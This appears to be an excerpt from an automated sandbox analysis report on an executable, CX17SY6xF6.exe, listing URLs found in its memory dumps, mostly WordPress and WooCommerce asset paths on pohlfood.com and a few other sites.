                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130319023937_Ama-216_105x150-aspect-wr.
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130319024157__DSC0432_105x150-aspect-wr
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130319024300_Ama-10_105x150-aspect-wr.j
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130412103548_WG-abends_105x150-aspect-w
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130422130443_Romantik-Arrangement02_105
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/zh
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.701687023.0000000007360000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hummer.hu/
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.681114888.0000000007217000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635716132.0000000007260000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.cdnpark.com/themes/registrar/511803.css
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://matrix-cms.de/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/login/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/register/
                  Source: CX17SY6xF6.exe, 00000000.00000003.766371210.00000000071BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ncn.de/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pcgrate.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ve
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.14
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.14
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.50
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/js/ooohboi-steroids.js?
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/flipbook.style.css?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/font-awesome.css?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/embed.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.book3.min.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.min.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.swipe.min.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.webgl.min.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/iscroll.min.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/pdf.min.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/three.min.js?ver=3.25
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/tfc-product-catalog/tfc-product-catalog.js?ver=1.0.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/css.css?ver=2.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/js.js?ver=2.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/css.css?ver=2.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/js.js?ver=2.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/js.min.js?ver=2.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/css.css?ver=2.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/js.js?ver=2.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.8.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.8.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-theme-child/style.css?ver=1.0.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=1687814006
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1687814005
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-410.css?ver=1687814006
